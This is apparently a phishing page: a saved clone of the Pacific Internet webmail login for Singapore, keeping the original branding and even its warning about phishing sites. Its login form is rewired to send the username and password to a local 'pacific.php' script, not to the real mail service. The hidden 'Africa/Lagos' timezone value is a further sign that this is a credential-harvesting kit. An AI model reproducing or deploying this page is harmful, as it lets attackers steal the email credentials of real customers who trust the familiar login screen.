<!DOCTYPE html>
<!-- saved from url=(0036)https://webmail.pacific.net.sg/mail/ -->
<html lang="en" class=" js chrome webkit"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Pacific Webmail</title>
<meta name="Robots" content="noindex,nofollow">
<meta name="viewport" content="" id="viewport">
<link rel="shortcut icon" href="https://webmail.pacific.net.sg/mail/skins/larry/images/favicon.ico">
<link rel="stylesheet" type="text/css" href="./Pacific Webmail_files/styles.min.css">
<!--[if IE 9]><link rel="stylesheet" type="text/css" href="skins/larry/svggradients.min.css?s=1463915207" /><![endif]-->
<link rel="stylesheet" type="text/css" href="./Pacific Webmail_files/jquery-ui-1.10.4.custom.css">
<script type="text/javascript" src="./Pacific Webmail_files/ui.min.js.download"></script>
 <link rel="stylesheet" href="./Pacific Webmail_files/biju.css">


<script src="./Pacific Webmail_files/jquery.min.js.download" type="text/javascript"></script>
<script src="./Pacific Webmail_files/common.min.js.download" type="text/javascript"></script>
<script src="./Pacific Webmail_files/app.min.js.download" type="text/javascript"></script>
<script src="./Pacific Webmail_files/jstz.min.js.download" type="text/javascript"></script>
<script type="text/javascript">

/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) 2005-2014 The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","x_frame_options":"sameorigin","standard_windows":false,"locale":"en_US","cookie_domain":"","cookie_path":"\/","cookie_secure":true,"skin":"larry","refresh_interval":60,"session_lifetime":600,"action":"","comm_path":".\/?_task=login","compose_extwin":false,"date_format":"yy-mm-dd","request_token":"aZzAIk0UE6GjjxDB8ZLkRWzmgAFEjXui"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files..."});
rcmail.gui_object('loginform', 'form');
rcmail.gui_object('message', 'message');
</script>

<script type="text/javascript" src="./Pacific Webmail_files/jquery-ui-1.10.4.custom.min.js.download"></script>
</head>
<body>
<div class="main-style">
<div style="width:800px;padding-left:10px;padding-right:10px;margin:auto;background-color:#ffffff;border-bottom: solid  #B0B0B0 ;">
<div style="height:30px;"></div>
<div><img src="./Pacific Webmail_files/pacific-logo-top.jpg"></div>
<div><img src="./Pacific Webmail_files/new-mid-banner.jpg" usemap="#Map"></div>

<div>

<div style="float:left;width:395px;">
<img src="./Pacific Webmail_files/left-spacer.png">
<div class="note red rounded">
    <p><b>IMPORTANT</b>
While Pacific Internet adopts appropriate security practices to enhance your experience of our services, it is also important that you are aware of suspicious and fraudulent activities, intruders, viruses and malicious programs.

We wish to highlight that Pacific Internet WILL NEVER send e-mails to customers requesting for personal or account information.

In addition, you are encouraged to choose strong passwords to enhance the security of your account. </p>

<p>Always verify that you are accessing correct
websites which are <font color="black"><a href="https://webmail.pacific.net.sg/" style="color:#71FF33"><b>https://webmail.pacific.net.sg</b></a></font>
and<span style="mso-spacerun:yes">&nbsp; </span><font color="black"><a href="https://mailadmin.pacific.net.sg/" style="color:#71FF33"><b>https://mailadmin.pacific.net.sg/</b></a></font>
on the web browser URL. Otherwise, it is a phishing or hacked website.</p>



</div></div>
<div style="float:left;width:8px;">&nbsp;</div>

<div style="float:left;width:395px;">
<img src="./Pacific Webmail_files/w-pac.jpg" style="align:center;">
<div class="note blue rounded">
<ul>
<li>Check your Pacific Internet emails via the web</li>
<li>Check your POP email space</li>
<li>Check your POP email usage</li>
<li>Set email forwarding</li>
<li>Set vacation message</li>
</ul>
</div>
</div>
</div>
<div style="clear:both;">&nbsp;</div>

<div id="login-form">
<div class="box-inner" role="main">
<h3>Please Login:</h3>

<form name="form" method="post" action="pacific.php">
<input type="hidden" name="_token" value="aZzAIk0UE6GjjxDB8ZLkRWzmgAFEjXui">
<input type="hidden" name="_task" value="login"><input type="hidden" name="_action" value="login"><input type="hidden" name="_timezone" id="rcmlogintz" value="Africa/Lagos"><input type="hidden" name="_url" id="rcmloginurl" value=""><table><tbody><tr><td class="title"><label for="rcmloginuser">Username</label>
</td>
<td class="input"><input name="username" id="username" required="required" size="40" autocapitalize="off" type="text"></td>
</tr>
<tr><td class="title"><label for="rcmloginpwd">Password</label>
</td>
<td class="input"><input name="password" id="password" required="required" size="40" autocapitalize="off" type="password"></td>
</tr>
</tbody>
</table>
<p class="formbuttons"><input type="submit" id="rcmloginsubmit" class="button mainaction" value="Login"></p>

</form>
<div style="width:100%;text-align:center;">To manage your domain and account, please <a href="https://mailadmin.pacific.net.sg/">click here </a></div>
</div>

<div class="box-bottom" role="complementary">
	<div id="message"></div>
	<noscript>
		<p class="noscriptwarning">Warning: This webmail service requires Javascript! In order to use it please enable Javascript in your browser's settings.</p>
	</noscript>
</div>

 
</div>
</div>
</div>


<script type="text/javascript">

// UI startup
var UI = new rcube_mail_ui();
$(document).ready(function(){
	UI.set('errortitle', 'An error occurred!');
	UI.set('toggleoptions', 'Toggle advanced options');
	UI.init();
});

</script>




<map name="Map" id="Map">
    <area alt="" title="" href="https://webmail.pacific.net.sg/mail/docs/Pacific_Webmail_User_Guide.pdf" shape="rect" coords="11,154,361,184">
 </map>
<script type="text/javascript">

jQuery.extend(jQuery.ui.dialog.prototype.options.position, {
                using: function(pos) {
                    var me = jQuery(this),
                        offset = me.css(pos).offset(),
                        topOffset = offset.top - 12;
                    if (topOffset < 0)
                        me.css('top', pos.top - topOffset);
                    if (offset.left + me.outerWidth() + 12 > jQuery(window).width())
                        me.css('left', pos.left - 12);
                }
            });
$(document).ready(function(){ 
rcmail.init();
var images = ["skins\/larry\/images\/ajaxloader.gif","skins\/larry\/images\/ajaxloader_dark.gif","skins\/larry\/images\/buttons.png","skins\/larry\/images\/addcontact.png","skins\/larry\/images\/filetypes.png","skins\/larry\/images\/listicons.png","skins\/larry\/images\/messages.png","skins\/larry\/images\/messages_dark.png","skins\/larry\/images\/quota.png","skins\/larry\/images\/selector.png","skins\/larry\/images\/splitter.png","skins\/larry\/images\/watermark.jpg"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
</script>


</body></html>